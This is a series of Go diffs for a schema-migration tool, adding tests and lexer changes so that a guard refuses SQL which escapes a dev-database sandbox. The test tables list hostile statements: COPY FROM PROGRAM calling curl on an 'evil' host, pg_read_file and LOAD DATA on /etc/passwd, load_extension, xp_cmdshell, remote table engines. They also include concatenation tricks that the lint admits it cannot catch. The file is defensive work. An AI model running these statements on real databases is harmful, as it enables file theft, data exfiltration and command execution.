 // `COPY t FROM STDIN` has no string argument and does not match.
-func hasStringArgumentAfter(tokens []lexer.Token, keywords []string) bool {
-	for i, token := range tokens {
-		if token.Type != lexer.TokenIdentifier || i+1 >= len(tokens) {
-			continue
+func stringArgumentAfter(keywords ...string) tokenMatcher {
+	return func(tokens []lexer.Token) bool {
+		for i, token := range tokens {
+			if token.Type != lexer.TokenIdentifier || i+1 >= len(tokens) {
+				continue
+			}
+			if tokens[i+1].Type != lexer.TokenString {
+				continue
+			}
+			if slices.Contains(keywords, strings.ToUpper(token.Value)) {
+				return true
+			}
 		}
-		if tokens[i+1].Type != lexer.TokenString {
-			continue
-		}
-		value := strings.ToUpper(token.Value)
-		if slices.Contains(keywords, value) {
-			return true
-		}
+		return false
 	}
-	return false
+}
+
+// isKeyword reports whether a token is the given bare SQL keyword. Quoted
+// identifiers never match: the lexer emits double-quoted ones as strings and
+// keeps the quotes on backticked and bracketed ones, and a quoted keyword is
+// an ordinary identifier to the database anyway.
+func isKeyword(token lexer.Token, keyword string) bool {
+	return token.Type == lexer.TokenIdentifier && strings.EqualFold(token.Value, keyword)
 }
 
 // significantTokens tokenizes a statement, dropping whitespace and comments so
-// rules see the executable token sequence. Quoted identifiers keep their
-// quotes (backticks, brackets) or arrive as strings, so they never match a
-// bare-keyword rule.
-func significantTokens(statement string, backslashEscapes bool) []lexer.Token {
+// rules see the executable token sequence. The lexer options mirror
+// [SplitApplyStatements] for the same dialect, so the scanner and the executor
+// agree on what is a string, a comment, and a quoted identifier.
+func significantTokens(statement string, backslashEscapes bool, dialect string) []lexer.Token {
+	normalized := platform.NormalizeDialect(dialect)
 	lexr := lexer.NewLexerWithOptions(statement, lexer.Options{
-		StandardStrings:  true,
-		BackslashEscapes: backslashEscapes,
+		StandardStrings:     true,
+		BackslashEscapes:    backslashEscapes,
+		BracketIdentifiers:  normalized == platform.SQLServer,
+		DisableHashComments: normalized == platform.SQLServer,
 	})
 	var tokens []lexer.Token
 	for {

--- a/internal/atlasschema/planguard_enforcement_test.go
+++ b/internal/atlasschema/planguard_enforcement_test.go
@@ -103,6 +103,25 @@ func TestEphemeralSQLiteDevStillRunsOrdinaryDDL(t *testing.T) {
 	})
 }
 
+// TestUntrustedSQLSessionRejectsNilCallback pins the guard its sibling
+// WithSession already has. The wrapper passes its own closure down, so
+// WithSession's nil check never sees the caller's callback and a nil would be
+// dereferenced instead of reported.
+func TestUntrustedSQLSessionRejectsNilCallback(t *testing.T) {
+	c := qt.New(t)
+	devURL, cleanup, err := atlasschema.NewEphemeralSQLiteDev()
+	c.Assert(err, qt.IsNil)
+	c.Cleanup(cleanup)
+	ctx := context.Background()
+	conn, err := dbschema.ConnectToDatabase(ctx, devURL)
+	c.Assert(err, qt.IsNil)
+	defer dbschema.CloseAndWarn(conn)
+
+	err = conn.WithUntrustedSQLSession(ctx, nil)
+
+	c.Assert(err, qt.ErrorMatches, `database session callback is nil`)
+}
+
 // TestUntrustedSQLSessionRestrictsBeforeTheCallback pins that the session
 // arrives already restricted: the callback never gets a window in which the
 // escape would work.

--- a/internal/atlasschema/planguard_enforcement_test.go
+++ b/internal/atlasschema/planguard_enforcement_test.go
@@ -1,0 +1,153 @@
+package atlasschema_test
+
+import (
+	"context"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	qt "github.com/frankban/quicktest"
+
+	"github.com/stokaro/ptah/dbschema"
+	"github.com/stokaro/ptah/internal/atlasschema"
+)
+
+// The escape lint is best-effort and can be defeated (string concatenation
+// alone is enough). These tests cover the part that is not best-effort: on the
+// ephemeral SQLite dev database Ptah creates for itself, the engine refuses the
+// escape whether or not the lint saw it. Every test here runs the payload
+// DIRECTLY against the restricted session, bypassing the lint completely, so a
+// pass means containment does not depend on pattern matching.
+
+// restrictedEphemeralDev opens the ephemeral SQLite dev database Ptah would
+// create for a rehearsal, pins a session, and applies the engine-level
+// restrictions. The callback receives a connection whose statements the lint
+// never inspected.
+func restrictedEphemeralDev(c *qt.C, use func(*dbschema.DatabaseConnection)) {
+	c.Helper()
+	devURL, cleanup, err := atlasschema.NewEphemeralSQLiteDev()
+	c.Assert(err, qt.IsNil)
+	c.Cleanup(cleanup)
+
+	ctx := context.Background()
+	conn, err := dbschema.ConnectToDatabase(ctx, devURL)
+	c.Assert(err, qt.IsNil)
+	c.Cleanup(func() { dbschema.CloseAndWarn(conn) })
+
+	c.Assert(conn.WithSession(ctx, func(session *dbschema.DatabaseConnection) error {
+		if err := session.RestrictSQLiteSession(ctx); err != nil {
+			return err
+		}
+		use(session)
+		return nil
+	}), qt.IsNil)
+}
+
+func TestEphemeralSQLiteDevRefusesAttachAtTheEngine(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	victimPath := filepath.Join(dir, "victim.db")
+	seedPlanSQLite(c, victimPath, `CREATE TABLE untouched (id INTEGER PRIMARY KEY);`)
+
+	restrictedEphemeralDev(c, func(session *dbschema.DatabaseConnection) {
+		ctx := context.Background()
+
+		// The exact payload from the original escape, run with no lint in
+		// front of it.
+		_, err := session.ExecContext(ctx, fmt.Sprintf("ATTACH DATABASE %q AS victim", victimPath))
+
+		c.Assert(err, qt.IsNotNil)
+		c.Assert(err.Error(), qt.Contains, "too many attached databases")
+	})
+
+	// The victim database never gained the attacker's table.
+	c.Assert(sqliteHasTable(c, victimPath, "pwned"), qt.IsFalse)
+	c.Assert(sqliteHasTable(c, victimPath, "untouched"), qt.IsTrue)
+}
+
+func TestEphemeralSQLiteDevRefusesFilesystemWritesAtTheEngine(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	copyPath := filepath.Join(dir, "exfiltrated.db")
+
+	restrictedEphemeralDev(c, func(session *dbschema.DatabaseConnection) {
+		ctx := context.Background()
+
+		// VACUUM INTO writes a database copy to an arbitrary path. SQLite
+		// implements it by attaching, so the same restriction covers it.
+		_, err := session.ExecContext(ctx, fmt.Sprintf("VACUUM INTO %q", copyPath))
+		c.Assert(err, qt.IsNotNil)
+
+		// Loading a native extension is refused by the driver's defaults.
+		_, err = session.ExecContext(ctx, `SELECT load_extension('/tmp/evil.so')`)
+		c.Assert(err, qt.IsNotNil)
+		c.Assert(err.Error(), qt.Contains, "not authorized")
+	})
+
+	_, statErr := os.Stat(copyPath)
+	c.Assert(os.IsNotExist(statErr), qt.IsTrue)
+}
+
+func TestEphemeralSQLiteDevStillRunsOrdinaryDDL(t *testing.T) {
+	c := qt.New(t)
+
+	restrictedEphemeralDev(c, func(session *dbschema.DatabaseConnection) {
+		ctx := context.Background()
+
+		// The restriction must not get in the way of the rehearsal itself.
+		_, err := session.ExecContext(ctx, `CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)`)
+		c.Assert(err, qt.IsNil)
+		_, err = session.ExecContext(ctx, `CREATE INDEX idx_users_email ON users (email)`)
+		c.Assert(err, qt.IsNil)
+		_, err = session.ExecContext(ctx, `INSERT INTO users (email) VALUES ('a@example.com')`)
+		c.Assert(err, qt.IsNil)
+	})
+}
+
+func TestRestrictSQLiteSessionRequiresPinnedSession(t *testing.T) {
+	c := qt.New(t)
+	devURL, cleanup, err := atlasschema.NewEphemeralSQLiteDev()
+	c.Assert(err, qt.IsNil)
+	c.Cleanup(cleanup)
+	ctx := context.Background()
+	conn, err := dbschema.ConnectToDatabase(ctx, devURL)
+	c.Assert(err, qt.IsNil)
+	defer dbschema.CloseAndWarn(conn)
+
+	// Without a pinned session the restriction would apply to one pooled
+	// connection while the rehearsal ran on another, so it refuses instead of
+	// silently protecting nothing.
+	err = conn.RestrictSQLiteSession(ctx)
+
+	c.Assert(err, qt.ErrorMatches, `sqlite session restriction requires a pinned session; call it inside WithSession`)
+}
+
+// sqliteHasTable reports whether a SQLite database file contains a table.
+func sqliteHasTable(c *qt.C, dbPath, table string) bool {
+	c.Helper()
+	conn, err := dbschema.ConnectToDatabase(context.Background(), "sqlite://"+dbPath)
+	c.Assert(err, qt.IsNil)
+	defer dbschema.CloseAndWarn(conn)
+	row := conn.QueryRowContext(context.Background(),
+		`SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = ?`, table)
+	var count int
+	c.Assert(row.Scan(&count), qt.IsNil)
+	return count > 0
+}
+
+// seedPlanSQLite creates a SQLite database file with the given DDL.
+func seedPlanSQLite(c *qt.C, dbPath, ddl string) {
+	c.Helper()
+	conn, err := dbschema.ConnectToDatabase(context.Background(), "sqlite://"+dbPath)
+	c.Assert(err, qt.IsNil)
+	defer dbschema.CloseAndWarn(conn)
+	for statement := range strings.SplitSeq(ddl, ";") {
+		if strings.TrimSpace(statement) == "" {
+			continue
+		}
+		_, err := conn.ExecContext(context.Background(), statement)
+		c.Assert(err, qt.IsNil)
+	}
+}

--- a/internal/atlasschema/planguard_enforcement_test.go
+++ b/internal/atlasschema/planguard_enforcement_test.go
@@ -36,10 +36,7 @@ func restrictedEphemeralDev(c *qt.C, use func(*dbschema.DatabaseConnection)) {
 	c.Assert(err, qt.IsNil)
 	c.Cleanup(func() { dbschema.CloseAndWarn(conn) })
 
-	c.Assert(conn.WithSession(ctx, func(session *dbschema.DatabaseConnection) error {
-		if err := session.RestrictSQLiteSession(ctx); err != nil {
-			return err
-		}
+	c.Assert(conn.WithUntrustedSQLSession(ctx, func(session *dbschema.DatabaseConnection) error {
 		use(session)
 		return nil
 	}), qt.IsNil)
@@ -106,7 +103,10 @@ func TestEphemeralSQLiteDevStillRunsOrdinaryDDL(t *testing.T) {
 	})
 }
 
-func TestRestrictSQLiteSessionRequiresPinnedSession(t *testing.T) {
+// TestUntrustedSQLSessionRestrictsBeforeTheCallback pins that the session
+// arrives already restricted: the callback never gets a window in which the
+// escape would work.
+func TestUntrustedSQLSessionRestrictsBeforeTheCallback(t *testing.T) {
 	c := qt.New(t)
 	devURL, cleanup, err := atlasschema.NewEphemeralSQLiteDev()
 	c.Assert(err, qt.IsNil)
@@ -116,12 +116,14 @@ func TestRestrictSQLiteSessionRequiresPinnedSession(t *testing.T) {
 	c.Assert(err, qt.IsNil)
 	defer dbschema.CloseAndWarn(conn)
 
-	// Without a pinned session the restriction would apply to one pooled
-	// connection while the rehearsal ran on another, so it refuses instead of
-	// silently protecting nothing.
-	err = conn.RestrictSQLiteSession(ctx)
-
-	c.Assert(err, qt.ErrorMatches, `sqlite session restriction requires a pinned session; call it inside WithSession`)
+	c.Assert(conn.WithUntrustedSQLSession(ctx, func(session *dbschema.DatabaseConnection) error {
+		// First statement of the callback, before anything else touches the
+		// session.
+		_, execErr := session.ExecContext(ctx, `ATTACH DATABASE ':memory:' AS probe`)
+		c.Assert(execErr, qt.IsNotNil)
+		c.Assert(execErr.Error(), qt.Contains, "too many attached databases")
+		return nil
+	}), qt.IsNil)
 }
 
 // sqliteHasTable reports whether a SQLite database file contains a table.

--- a/internal/atlasschema/planguard_test.go
+++ b/internal/atlasschema/planguard_test.go
@@ -1,0 +1,193 @@
+package atlasschema_test
+
+import (
+	"testing"
+
+	qt "github.com/frankban/quicktest"
+
+	"github.com/stokaro/ptah/internal/atlasschema"
+)
+
+func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
+	tests := []struct {
+		name      string
+		statement string
+		construct string
+	}{
+		{
+			name:      "sqlite_attach_database",
+			statement: `ATTACH DATABASE '/tmp/target.db' AS victim`,
+			construct: "ATTACH",
+		},
+		{
+			name:      "sqlite_attach_without_database_keyword",
+			statement: `attach '/tmp/target.db' as victim`,
+			construct: "ATTACH",
+		},
+		{
+			name:      "sqlite_detach",
+			statement: `DETACH DATABASE victim`,
+			construct: "DETACH",
+		},
+		{
+			name:      "sqlite_vacuum_into",
+			statement: `VACUUM INTO '/tmp/copy.db'`,
+			construct: "VACUUM INTO",
+		},
+		{
+			name:      "mysql_load_data_local_infile",
+			statement: `LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE users`,
+			construct: "LOAD DATA INFILE",
+		},
+		{
+			name:      "mysql_select_into_outfile",
+			statement: `SELECT * FROM users INTO OUTFILE '/tmp/dump.txt'`,
+			construct: "SELECT ... INTO OUTFILE",
+		},
+		{
+			name:      "mysql_select_into_dumpfile",
+			statement: `SELECT payload FROM t INTO DUMPFILE '/tmp/x.so'`,
+			construct: "SELECT ... INTO DUMPFILE",
+		},
+		{
+			name:      "postgres_copy_from_program",
+			statement: `COPY users FROM PROGRAM 'curl http://evil/x'`,
+			construct: "COPY ... PROGRAM",
+		},
+		{
+			name:      "postgres_copy_to_file",
+			statement: `COPY users TO '/tmp/users.csv'`,
+			construct: "COPY with a file path",
+		},
+		{
+			name:      "postgres_dblink",
+			statement: `SELECT * FROM dblink('dbname=target', 'SELECT 1') AS t(x int)`,
+			construct: "dblink",
+		},
+		{
+			name:      "postgres_dblink_exec_prefix",
+			statement: `SELECT dblink_exec('dbname=target', 'DROP TABLE users')`,
+			construct: "dblink",
+		},
+		{
+			name:      "postgres_fdw_extension",
+			statement: `CREATE EXTENSION postgres_fdw`,
+			construct: "postgres_fdw",
+		},
+		{
+			name:      "postgres_file_fdw_extension",
+			statement: `CREATE EXTENSION file_fdw`,
+			construct: "file_fdw",
+		},
+		{
+			name:      "postgres_pg_read_file",
+			statement: `SELECT pg_read_file('/etc/passwd')`,
+			construct: "pg_read_file",
+		},
+		{
+			name:      "postgres_lo_export",
+			statement: `SELECT lo_export(loid, '/tmp/out.bin') FROM t`,
+			construct: "lo_export",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+
+			err := atlasschema.CheckPlanStatementsSandboxable([]string{
+				`CREATE TABLE ok (id integer)`,
+				tt.statement,
+			})
+
+			// The refusal names the offending statement position and the
+			// construct, and it must be recognizable as an escape refusal.
+			c.Assert(err, qt.IsNotNil)
+			c.Assert(atlasschema.IsPlanEscape(err), qt.IsTrue)
+			c.Assert(err, qt.ErrorMatches,
+				`pre-planned migration cannot be verified on a dev database: statement 2 uses `+tt.construct+`, which .*`)
+			c.Assert(err, qt.ErrorMatches, `(?s).*Replaying it would not be a sandboxed rehearsal.*`)
+		})
+	}
+}
+
+func TestCheckPlanStatementsSandboxableAllowsOrdinaryDDL(t *testing.T) {
+	tests := []struct {
+		name      string
+		statement string
+	}{
+		{
+			name:      "table_named_attachment",
+			statement: `CREATE TABLE attachment (id integer NOT NULL PRIMARY KEY)`,
+		},
+		{
+			name:      "quoted_table_named_attach",
+			statement: `CREATE TABLE "attach" (id integer)`,
+		},
+		{
+			name:      "backticked_column_named_outfile",
+			statement: "ALTER TABLE `reports` ADD COLUMN `outfile` text",
+		},
+		{
+			name:      "quoted_column_named_infile",
+			statement: `ALTER TABLE reports ADD COLUMN "infile" text`,
+		},
+		{
+			name:      "string_literal_containing_attach",
+			statement: `INSERT INTO notes (body) VALUES ('please ATTACH DATABASE later')`,
+		},
+		{
+			name:      "string_literal_containing_copy_program",
+			statement: `ALTER TABLE t ADD COLUMN note text DEFAULT 'COPY x FROM PROGRAM ls'`,
+		},
+		{
+			name:      "comment_mentioning_attach",
+			statement: "-- ATTACH DATABASE '/tmp/x.db' AS y\nCREATE TABLE ok (id integer)",
+		},
+		{
+			name:      "copy_from_stdin_has_no_file_argument",
+			statement: `COPY users (id, name) FROM STDIN`,
+		},
+		{
+			name:      "ordinary_create_index",
+			statement: `CREATE INDEX idx_posts_user_id ON posts (user_id)`,
+		},
+		{
+			name:      "column_named_program",
+			statement: `CREATE TABLE jobs (program text NOT NULL)`,
+		},
+		{
+			name:      "vacuum_without_into",
+			statement: `VACUUM`,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+
+			c.Assert(atlasschema.CheckPlanStatementsSandboxable([]string{tt.statement}), qt.IsNil)
+		})
+	}
+}
+
+func TestCheckPlanStatementsSandboxableScansBothStringEscapeDialects(t *testing.T) {
+	c := qt.New(t)
+
+	// Under MySQL-family backslash escapes the literal ends at the escaped
+	// quote and ATTACH is code; under PostgreSQL rules the same bytes parse
+	// differently. Scanning both interpretations means neither reading can
+	// smuggle an escape past the guard.
+	statement := `INSERT INTO t VALUES ('\'); ATTACH DATABASE '/tmp/x.db' AS y; --')`
+
+	err := atlasschema.CheckPlanStatementsSandboxable([]string{statement})
+
+	c.Assert(atlasschema.IsPlanEscape(err), qt.IsTrue, qt.Commentf("err=%v", err))
+}
+
+func TestCheckPlanStatementsSandboxableAcceptsEmptyInput(t *testing.T) {
+	c := qt.New(t)
+
+	c.Assert(atlasschema.CheckPlanStatementsSandboxable(nil), qt.IsNil)
+	c.Assert(atlasschema.CheckPlanStatementsSandboxable([]string{"", "   "}), qt.IsNil)
+}

--- a/internal/atlasschema/planguard_test.go
+++ b/internal/atlasschema/planguard_test.go
@@ -41,9 +41,20 @@ func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
 			construct: "PRAGMA temp_store_directory",
 		},
 		{
+			// The block itself is ordinary PostgreSQL; what it calls is not.
 			name:      "postgres_do_block_calling_dblink",
 			statement: "DO $$ BEGIN PERFORM dblink_exec('dbname=target', 'DROP TABLE users'); END $$",
-			construct: "DO",
+			construct: "dblink",
+		},
+		{
+			name:      "postgres_do_block_copy_from_program",
+			statement: "DO $$ BEGIN COPY t FROM PROGRAM 'curl evil'; END $$",
+			construct: "COPY ... PROGRAM",
+		},
+		{
+			name:      "postgres_single_quoted_do_block_reading_files",
+			statement: `DO 'BEGIN PERFORM pg_read_file(''/etc/passwd''); END' LANGUAGE plpgsql`,
+			construct: "pg_read_file",
 		},
 		{
 			name:      "postgres_function_body_reading_files",
@@ -451,6 +462,23 @@ func TestCheckPlanStatementsSandboxableAllowsOrdinaryDDL(t *testing.T) {
 		{
 			name:      "table_named_bulk_with_insert_column",
 			statement: `CREATE TABLE bulk (insert_count integer)`,
+		},
+		{
+			// The idempotent-DDL idiom every PostgreSQL plan is full of. An
+			// anonymous block is not an escape; refusing it wholesale broke
+			// the interop this reader exists for.
+			name: "postgres_do_block_idempotent_create_type",
+			statement: "DO $$ BEGIN IF NOT EXISTS (SELECT 1 FROM pg_type WHERE typname = 'status') " +
+				`THEN CREATE TYPE "status" AS ENUM ('a'); END IF; END $$`,
+		},
+		{
+			name: "postgres_do_block_duplicate_column_guard",
+			statement: "DO $$ BEGIN ALTER TABLE users ADD COLUMN email text; " +
+				"EXCEPTION WHEN duplicate_column THEN NULL; END $$",
+		},
+		{
+			name:      "postgres_do_block_plain_ddl",
+			statement: "DO $$ BEGIN CREATE INDEX idx_users_email ON users (email); END $$",
 		},
 	}
 

--- a/internal/atlasschema/planguard_test.go
+++ b/internal/atlasschema/planguard_test.go
@@ -155,6 +155,111 @@ func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
 			statement: `SELECT lo_export(loid, '/tmp/out.bin') FROM t`,
 			construct: "lo_export",
 		},
+		{
+			// Quoting a function name does not change which function runs, so
+			// the quoted spellings must not be a bypass.
+			name:      "double_quoted_pg_read_file",
+			statement: `SELECT "pg_read_file"('/etc/passwd')`,
+			construct: "pg_read_file",
+		},
+		{
+			name:      "double_quoted_dblink_exec",
+			statement: `SELECT "dblink_exec"('dbname=target', 'DROP TABLE users')`,
+			construct: "dblink",
+		},
+		{
+			name:      "double_quoted_lo_import",
+			statement: `SELECT "lo_import"('/etc/passwd')`,
+			construct: "lo_import",
+		},
+		{
+			name:      "double_quoted_qualified_pg_read_file",
+			statement: `SELECT "pg_catalog"."pg_read_file"('/etc/passwd')`,
+			construct: "pg_read_file",
+		},
+		{
+			name:      "backticked_load_file",
+			statement: "INSERT INTO t (c) VALUES (`load_file`('/etc/passwd'))",
+			construct: "LOAD_FILE",
+		},
+		{
+			name:      "bracketed_xp_cmdshell",
+			statement: `EXEC [xp_cmdshell] 'dir c:\'`,
+			dialect:   "sqlserver",
+			construct: "xp_cmdshell",
+		},
+		{
+			// Statement-anchored rules must fire on the FIRST statement of a
+			// routine body, which has no separator in front of it.
+			name:      "first_statement_of_body_copy_program",
+			statement: "CREATE FUNCTION f() RETURNS void AS $$ BEGIN COPY t FROM PROGRAM 'curl evil'; END $$ LANGUAGE plpgsql",
+			construct: "COPY ... PROGRAM",
+		},
+		{
+			name:      "first_statement_of_body_attach",
+			statement: "CREATE FUNCTION f() RETURNS void AS $$ BEGIN ATTACH DATABASE '/tmp/x.db' AS v; END $$ LANGUAGE plpgsql",
+			construct: "ATTACH",
+		},
+		{
+			name:      "statement_after_then_in_body",
+			statement: "CREATE FUNCTION f() RETURNS void AS $$ BEGIN IF true THEN COPY t FROM PROGRAM 'curl evil'; END IF; END $$ LANGUAGE plpgsql",
+			construct: "COPY ... PROGRAM",
+		},
+		{
+			name:      "statement_after_loop_in_body",
+			statement: "CREATE FUNCTION f() RETURNS void AS $$ BEGIN LOOP ATTACH DATABASE '/tmp/x.db' AS v; END LOOP; END $$ LANGUAGE plpgsql",
+			construct: "ATTACH",
+		},
+		{
+			name:      "dynamic_execute_of_concatenated_prefix",
+			statement: "CREATE FUNCTION f() RETURNS void AS $$ BEGIN EXECUTE ('ATTACH DATABASE ''/tmp/x.db'' AS v'); END $$ LANGUAGE plpgsql",
+			construct: "ATTACH",
+		},
+		{
+			name:      "sqlserver_bulk_insert",
+			statement: `BULK INSERT users FROM 'c:\payload.csv'`,
+			dialect:   "sqlserver",
+			construct: "BULK INSERT",
+		},
+		{
+			name:      "sqlserver_openrowset",
+			statement: `SELECT * FROM OPENROWSET(BULK 'c:\secrets.txt', SINGLE_CLOB) AS x`,
+			dialect:   "sqlserver",
+			construct: "OPENROWSET",
+		},
+		{
+			name:      "sqlserver_sp_addlinkedserver",
+			statement: `EXEC sp_addlinkedserver @server = 'evil'`,
+			dialect:   "sqlserver",
+			construct: "sp_addlinkedserver",
+		},
+		{
+			name:      "clickhouse_url_engine",
+			statement: `CREATE TABLE remote (id UInt64) ENGINE = URL('http://evil/x', CSV)`,
+			dialect:   "clickhouse",
+			construct: "ClickHouse remote table engine",
+		},
+		{
+			name:      "clickhouse_mysql_engine",
+			statement: `CREATE TABLE remote (id UInt64) ENGINE = MySQL('evil:3306', 'db', 'users', 'u', 'p')`,
+			dialect:   "clickhouse",
+			construct: "ClickHouse remote table engine",
+		},
+		{
+			name:      "sqlite_load_extension",
+			statement: `SELECT load_extension('/tmp/evil.so')`,
+			construct: "load_extension",
+		},
+		{
+			name:      "sqlite_pragma_schema_qualified_temp_store_directory",
+			statement: `PRAGMA main.temp_store_directory = '/tmp/evil'`,
+			construct: "PRAGMA temp_store_directory",
+		},
+		{
+			name:      "sqlite_pragma_data_store_directory",
+			statement: `PRAGMA data_store_directory = '/tmp/evil'`,
+			construct: "PRAGMA data_store_directory",
+		},
 	}
 
 	for _, tt := range tests {
@@ -171,8 +276,8 @@ func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
 			c.Assert(err, qt.IsNotNil)
 			c.Assert(atlasschema.IsPlanEscape(err), qt.IsTrue)
 			c.Assert(err, qt.ErrorMatches,
-				`pre-planned migration cannot be verified on a dev database: statement 2 uses `+tt.construct+`, which .*`)
-			c.Assert(err, qt.ErrorMatches, `(?s).*Replaying it would not stay inside the dev database.*`)
+				`pre-planned migration was refused before it reached the dev database: statement 2 uses `+tt.construct+`, which .*`)
+			c.Assert(err, qt.ErrorMatches, `(?s).*A dev database executes plan SQL for real.*`)
 		})
 	}
 }
@@ -293,6 +398,59 @@ func TestCheckPlanStatementsSandboxableAllowsOrdinaryDDL(t *testing.T) {
 		{
 			name:      "plain_function_without_escapes",
 			statement: "CREATE FUNCTION bump() RETURNS integer AS $$ BEGIN RETURN 1; END $$ LANGUAGE plpgsql",
+		},
+		{
+			// Ordinary PL/pgSQL: message text and column values inside a
+			// routine body are data, not statements, and must not be scanned
+			// as SQL. Scanning them refused perfectly normal schemas.
+			name:      "routine_body_raise_exception_message",
+			statement: "CREATE FUNCTION guard() RETURNS trigger AS $$ BEGIN RAISE EXCEPTION 'Do not delete rows from this table'; END $$ LANGUAGE plpgsql",
+		},
+		{
+			name:      "routine_body_raise_notice_mentioning_copy_to",
+			statement: "CREATE FUNCTION note() RETURNS void AS $$ BEGIN RAISE NOTICE 'Copy to ''archive'' complete'; END $$ LANGUAGE plpgsql",
+		},
+		{
+			name:      "routine_body_insert_value_mentioning_attach",
+			statement: "CREATE FUNCTION seed() RETURNS void AS $$ BEGIN INSERT INTO docs (body) VALUES ('ATTACH the receipt here'); END $$ LANGUAGE plpgsql",
+		},
+		{
+			name:      "routine_body_default_mentioning_engine_federated",
+			statement: "CREATE FUNCTION note() RETURNS void AS $$ BEGIN RAISE NOTICE 'ENGINE=FEDERATED is not used here'; END $$ LANGUAGE plpgsql",
+		},
+		{
+			name:      "routine_body_message_mentioning_load_data_infile",
+			statement: "CREATE FUNCTION note() RETURNS void AS $$ BEGIN RAISE NOTICE 'LOAD DATA INFILE is forbidden'; END $$ LANGUAGE plpgsql",
+		},
+		{
+			name:      "routine_body_message_mentioning_do_block",
+			statement: "CREATE FUNCTION note() RETURNS void AS $$ BEGIN RAISE NOTICE 'DO NOT RUN THIS IN PRODUCTION'; END $$ LANGUAGE plpgsql",
+		},
+		{
+			// Adjacency false positives: none of these carries a path or an
+			// engine assignment, so none is the dangerous construct.
+			name:      "insert_into_table_named_outfile",
+			statement: `INSERT INTO outfile (id) VALUES (1)`,
+		},
+		{
+			name:      "select_into_table_named_outfile",
+			statement: `SELECT * INTO outfile FROM src`,
+		},
+		{
+			name:      "index_named_directory",
+			statement: `CREATE INDEX directory ON files (path)`,
+		},
+		{
+			name:      "columns_named_engine_and_federated",
+			statement: `INSERT INTO cfg (engine, federated) VALUES ('innodb', 1)`,
+		},
+		{
+			name:      "column_named_data_of_type_directory",
+			statement: `CREATE TABLE t (data directory)`,
+		},
+		{
+			name:      "table_named_bulk_with_insert_column",
+			statement: `CREATE TABLE bulk (insert_count integer)`,
 		},
 	}
 

--- a/internal/atlasschema/planguard_test.go
+++ b/internal/atlasschema/planguard_test.go
@@ -227,6 +227,24 @@ func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
 			construct: "ATTACH",
 		},
 		{
+			// The lexer splits `||` into two `|` tokens, so the walk-back has
+			// to accept the single-character form; matching only "||" left
+			// every concatenated executor argument unscanned.
+			name:      "dynamic_execute_of_concatenated_string",
+			statement: `EXECUTE ('PERFORM ' || 'pg_read_file(''/etc/passwd'')')`,
+			construct: "pg_read_file",
+		},
+		{
+			name:      "dynamic_execute_concatenated_without_parens",
+			statement: `EXECUTE 'PERFORM ' || 'pg_read_file(''/etc/passwd'')'`,
+			construct: "pg_read_file",
+		},
+		{
+			name:      "dynamic_execute_concatenated_in_routine_body",
+			statement: "CREATE FUNCTION f() RETURNS void AS $$ BEGIN EXECUTE 'SELECT ' || 'lo_export(loid, ''/tmp/out.bin'')'; END $$ LANGUAGE plpgsql",
+			construct: "lo_export",
+		},
+		{
 			name:      "sqlserver_bulk_insert",
 			statement: `BULK INSERT users FROM 'c:\payload.csv'`,
 			dialect:   "sqlserver",
@@ -480,6 +498,25 @@ func TestCheckPlanStatementsSandboxableAllowsOrdinaryDDL(t *testing.T) {
 			name:      "postgres_do_block_plain_ddl",
 			statement: "DO $$ BEGIN CREATE INDEX idx_users_email ON users (email); END $$",
 		},
+		{
+			// Concatenation that is not feeding a dynamic executor stays data.
+			// Accepting the single `|` token in the walk-back must not turn
+			// every concatenated literal into scanned code.
+			name:      "concatenated_default_value",
+			statement: `ALTER TABLE t ADD COLUMN note text DEFAULT 'x' || 'y'`,
+		},
+		{
+			name:      "concatenated_select_literal_mentioning_do",
+			statement: `SELECT 'Do not ' || 'delete rows'`,
+		},
+		{
+			name:      "concatenated_select_literal_mentioning_attach",
+			statement: `SELECT 'ATT' || 'ACH DATABASE'`,
+		},
+		{
+			name:      "concatenated_insert_value_mentioning_attach",
+			statement: `INSERT INTO docs (body) VALUES ('ATTACH the receipt here')`,
+		},
 	}
 
 	for _, tt := range tests {
@@ -489,6 +526,41 @@ func TestCheckPlanStatementsSandboxableAllowsOrdinaryDDL(t *testing.T) {
 			err := atlasschema.CheckPlanStatementsSandboxable([]string{tt.statement}, tt.dialect)
 
 			c.Assert(err, qt.IsNil)
+		})
+	}
+}
+
+// TestCheckPlanStatementsSandboxableCannotSeeSplitKeywords documents the
+// limitation the lint's own doc comment claims, with the evidence attached.
+// Scanning happens per string fragment, so a construct whose KEYWORD is split
+// across a concatenation is invisible — `'ATT' || 'ACH DATABASE ...'` never
+// contains the token ATTACH anywhere. This is why the dev database gets
+// engine-level restrictions and the docs refuse to call the lint a boundary;
+// if a future change makes these detectable, that is an improvement, not a
+// regression, and this test should be updated rather than trusted.
+func TestCheckPlanStatementsSandboxableCannotSeeSplitKeywords(t *testing.T) {
+	tests := []struct {
+		name      string
+		statement string
+	}{
+		{
+			name:      "attach_keyword_split_across_concatenation",
+			statement: `EXECUTE 'ATT' || 'ACH DATABASE ''/tmp/x.db'' AS v'`,
+		},
+		{
+			name:      "copy_program_split_across_concatenation",
+			statement: `EXECUTE 'COPY t FROM ' || 'PROGRAM ''curl evil'''`,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+
+			err := atlasschema.CheckPlanStatementsSandboxable([]string{tt.statement}, "postgres")
+
+			c.Assert(err, qt.IsNil, qt.Commentf(
+				"documented limitation: a lexical scan cannot reassemble a keyword split across literals"))
 		})
 	}
 }

--- a/internal/atlasschema/planguard_test.go
+++ b/internal/atlasschema/planguard_test.go
@@ -12,6 +12,7 @@ func TestCheckPlanStatementsSandboxableRefusesEscapes(t *testing.T) {
 	tests := []struct {
 		name      string
 		statement string
+		dialect   string
 		construct string
 	}{
